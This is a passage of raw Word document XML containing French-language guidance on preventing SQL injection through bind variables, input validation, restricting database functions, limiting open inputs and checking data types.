          <w:szCs w:val="24"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>Dans ce qui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suit quelques techniques qui peuvent être employées pour empêc</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t xml:space="preserve">her des attaques d'injection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>SQL</w:t>
      </w:r>
      <w:r w:rsidR="00DA5F45" w:rsidRPr="00DE6CEB">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t xml:space="preserve"> :</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DA5F45" w:rsidRPr="00BF414A" w:rsidRDefault="00BF414A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jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BF414A">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t xml:space="preserve">Utiliser les </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00BF414A">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>bind</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00BF414A">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t xml:space="preserve"> variables : </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DA5F45" w:rsidRPr="00DE6CEB" w:rsidRDefault="00DA5F45" w:rsidP="003D7008">
      <w:pPr>
        <w:bidi w:val="0"/>
        <w:spacing w:after="120" w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="284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La protection la plus puissante contre des </w:t>
      </w:r>
      <w:r w:rsidR="00BF414A">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t xml:space="preserve">attaques d'injection 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SQL est l'utilisation des </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00311C7C">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>bind</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00311C7C">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t xml:space="preserve"> variables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>.</w:t>
      </w:r>
      <w:r w:rsidR="00311C7C">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t xml:space="preserve"> Ces variables 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>améli</w:t>
      </w:r>
      <w:r w:rsidR="00BC65B1">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>oreront également l'exécution de l’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>application. Les normes de codage d'application dev</w:t>
      </w:r>
      <w:r w:rsidR="008912BB">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t xml:space="preserve">raient exiger l'utilisation de ces variables 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dans toutes les commandes SQL. Aucune commande SQL ne devrait être créée en </w:t>
      </w:r>
      <w:r w:rsidR="00A939B6">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t xml:space="preserve">concaténant </w:t>
      </w:r>
      <w:r w:rsidR="00EE6518">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t xml:space="preserve">un </w:t>
      </w:r>
      <w:r w:rsidR="00666D33">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>ensemble de</w:t>
      </w:r>
      <w:r w:rsidR="00A939B6">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t xml:space="preserve"> co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des et </w:t>
      </w:r>
      <w:r w:rsidR="00666D33">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>l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es paramètres </w:t>
      </w:r>
      <w:r w:rsidR="001A1E63">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>contrôlables</w:t>
      </w:r>
      <w:r w:rsidR="00D94452">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t xml:space="preserve"> par les utilisateurs.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DA5F45" w:rsidRPr="00F22353" w:rsidRDefault="00F22353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jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t xml:space="preserve">Valider les </w:t>
      </w:r>
      <w:r w:rsidR="00DA5F45" w:rsidRPr="00F22353">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>entrée</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>s</w:t>
      </w:r>
      <w:r w:rsidR="00DA5F45" w:rsidRPr="00F22353">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t xml:space="preserve"> :</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DA5F45" w:rsidRPr="00DE6CEB" w:rsidRDefault="00DA5F45" w:rsidP="003E3BEB">
      <w:pPr>
        <w:bidi w:val="0"/>
        <w:spacing w:after="120" w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="284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DE6CEB">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>Chaque paramètre passé d</w:t>
      </w:r>
      <w:r w:rsidR="00CE7EE1">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>ans le co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>de devrait être validé. La validation d'entrée devrait être appliquée d'abord au niveau de client. Les données passées</w:t>
      </w:r>
      <w:r w:rsidR="00CE7EE1">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t xml:space="preserve"> d’un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client doivent être examinées pour assurer la validation d'entrée au niveau de serveur avant de soumettre la </w:t>
      </w:r>
      <w:r w:rsidR="00FE6344">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>requête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au serveur de </w:t>
      </w:r>
      <w:r w:rsidR="00FE6344">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>base de données pour l'exécutée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. Si les données </w:t>
      </w:r>
      <w:r w:rsidR="00C63499">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>échouent de passer en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r w:rsidR="00C63499">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>processus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de validation, ell</w:t>
      </w:r>
      <w:r w:rsidR="00080CF2">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>es devraient être rejetées et un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message d'erreur devrait être retourné à l'utilisateur</w:t>
      </w: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>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DA5F45" w:rsidRPr="00DE6CEB" w:rsidRDefault="00DA5F45" w:rsidP="003D7008">
      <w:pPr>
        <w:bidi w:val="0"/>
        <w:spacing w:after="120" w:line="360" w:lineRule="auto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DE6CEB">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Beaucoup d'applications Web emploient les champs cachés et d'autres techniques, qui doivent également être validés.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DA5F45" w:rsidRPr="00EF7F60" w:rsidRDefault="00620FAF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ind w:left="714" w:hanging="357"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EF7F60">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>Fonctions de</w:t>
      </w:r>
      <w:r w:rsidR="00DA5F45" w:rsidRPr="00EF7F60">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00DF3D4D" w:rsidRPr="00EF7F60">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>sécurité</w:t>
      </w:r>
      <w:r w:rsidR="00DF3D4D">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00DF3D4D" w:rsidRPr="00EF7F60">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi" w:hint="cs"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000D1182" w:rsidRDefault="007D3A8C" w:rsidP="003D7008">
      <w:pPr>
        <w:bidi w:val="0"/>
        <w:spacing w:after="120" w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="284"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>L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es fonctions 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standard </w:t>
      </w:r>
      <w:r w:rsidR="00737DD5">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t xml:space="preserve">de base de données </w:t>
      </w:r>
      <w:r w:rsidR="00D01247">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>peuvent être exploitées dans les attaques d'injection</w:t>
      </w:r>
      <w:r w:rsidR="00DF3D4D">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t xml:space="preserve"> SQL</w:t>
      </w:r>
      <w:r w:rsidR="00AD7216">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>. L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es bases de données sont fournies avec des centaines de </w:t>
      </w:r>
      <w:r w:rsidR="00A05C41" w:rsidRPr="00DE6CEB">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>fonction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 xml:space="preserve"> standard et </w:t>
      </w:r>
      <w:r w:rsidR="00AD7216">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t xml:space="preserve">par défaut </w:t>
      </w:r>
      <w:r w:rsidR="000E1B59">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>toutes</w:t>
      </w:r>
      <w:r w:rsidR="00AD7216">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t xml:space="preserve"> ces fonctions peuvent </w:t>
      </w:r>
      <w:r w:rsidR="004E0A70">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>être</w:t>
      </w:r>
      <w:r w:rsidR="00AD7216">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t xml:space="preserve"> accédées par le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>PUBLIC.</w:t>
      </w:r>
      <w:r w:rsidR="00A833DF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r w:rsidR="00DA5F45" w:rsidRPr="00DE6CEB">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>Toutes les fonctions qui ne sont pas absolument nécessaires de l'application devraient être restreintes</w:t>
      </w:r>
      <w:r w:rsidR="00DA5F45" w:rsidRPr="00DE6CEB">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DA5F45" w:rsidRPr="003D5938" w:rsidRDefault="000D1182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ind w:left="567" w:hanging="567"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003D5938">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>Limiter les entrées ouvertes :</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DA5F45" w:rsidRPr="00DE6CEB" w:rsidRDefault="00DA5F45" w:rsidP="003E3BEB">
      <w:pPr>
        <w:bidi w:val="0"/>
        <w:spacing w:after="120" w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="284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Essayer de limiter </w:t>
      </w:r>
      <w:r w:rsidR="00D46913">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t xml:space="preserve">les entrées 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>ouvert</w:t>
      </w:r>
      <w:r w:rsidR="00D46913">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>es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</w:t>
      </w:r>
      <w:r w:rsidR="00D46913">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>là où il est possible</w:t>
      </w:r>
      <w:r w:rsidR="004F5566">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t xml:space="preserve">, en utilisant des select boxes au lieu des </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="004F5566">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>text</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="004F5566">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t xml:space="preserve"> boxes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. L'application doit appliquer la validation de </w:t>
      </w:r>
      <w:r w:rsidR="00BF513B">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>toutes</w:t>
      </w:r>
      <w:r w:rsidR="005946B0">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t xml:space="preserve"> les données </w:t>
      </w:r>
      <w:r w:rsidR="00BF513B">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>issues</w:t>
      </w:r>
      <w:r w:rsidR="005946B0">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t xml:space="preserve"> du client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. Pour la validation </w:t>
      </w:r>
      <w:r w:rsidR="0073348A">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>seulement l'option dans le select boxe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choisie devrait être prise </w:t>
      </w:r>
      <w:r w:rsidR="00545C45">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t xml:space="preserve">en compte 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et </w:t>
      </w:r>
      <w:r w:rsidR="00370052">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>toute autre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option</w:t>
      </w:r>
      <w:r w:rsidR="00370052">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>s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devrait être rejetée</w:t>
      </w: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>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DA5F45" w:rsidRPr="00BF6F1F" w:rsidRDefault="00DA5F45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ind w:left="567" w:hanging="567"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BF6F1F">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>Vérifier le type de données</w:t>
      </w:r>
      <w:r w:rsidRPr="00BF6F1F">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t xml:space="preserve"> :</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DA5F45" w:rsidRPr="00DE6CEB" w:rsidRDefault="00DA5F45" w:rsidP="003D7008">
      <w:pPr>
        <w:bidi w:val="0"/>
        <w:spacing w:after="120" w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="284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Vérifier le type de données </w:t>
      </w:r>
      <w:r w:rsidR="0061787F">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>en utilisant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 ISNUMERIC ou </w:t>
      </w:r>
      <w:r w:rsidR="00350DB7">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
